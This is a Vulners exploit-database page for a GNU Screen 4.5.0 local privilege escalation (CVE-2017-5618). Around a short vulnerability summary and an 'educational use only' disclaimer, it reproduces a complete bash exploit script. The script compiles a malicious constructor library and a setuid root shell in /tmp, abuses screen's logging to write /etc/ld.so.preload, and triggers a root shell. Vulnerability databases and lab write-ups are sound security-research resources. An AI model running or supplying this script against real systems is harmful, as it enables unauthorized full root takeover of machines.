Vulners
Lucene search
📄 GNU Screen 4.5.0 Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Gnu Bash | 27 Jul 202504:29 | – | gitee |
 | Exploit for Incorrect Authorization in Gnu Screen | 4 Oct 202521:18 | – | githubexploit |
| Exploit for Incorrect Authorization in Gnu Screen | 4 Oct 202521:18 | – | githubexploit |
 | CVE-2017-5618 | 20 Mar 201716:00 | – | alpinelinux |
 | CVE-2017-5618 | 11 Jul 201702:04 | – | circl |
 | Multiple Huawei Firewall Denial of Service Vulnerabilities (CNVD-2016-12339) | 15 Dec 201600:00 | – | cnvd |
| GNU Screen 'screen.c' Local Elevation of Privilege Vulnerability | 17 Feb 201700:00 | – | cnvd |
 | CVE-2016-8781 | 2 Apr 201720:00 | – | cve |
| CVE-2017-5618 | 20 Mar 201716:00 | – | cve |
 | CVE-2016-8781 | 2 Apr 201720:00 | – | cvelist |
10
### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)
## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.
## 🔧 Technical Details
Vulnerability: CVE-2017-5618
Type: Shared Library Hijacking via ld.so.preload
Affected: GNU Screen 4.5.0 exclusively
Fixed in: GNU Screen 4.6.0+
## 🎪 The Vulnerability Circus
CVE: 2017-5618 🎯
***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***
***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***
***The Payload: Instant root shell! 🐚***
## Script 🗒️
```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls
/tmp/rootshell
```
## Screenshots
> Checking Vulnerable Screen Version.
> Creating The File And Giving Required Permissions.
> Root Access Gained.
> Root shell achieved - full system control
## ⚠️ Warning Label
FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.
## Tested On
TryHackMe KOTH Room - FoodData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Oct 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.2
CVSS 37.8
EPSS0.02292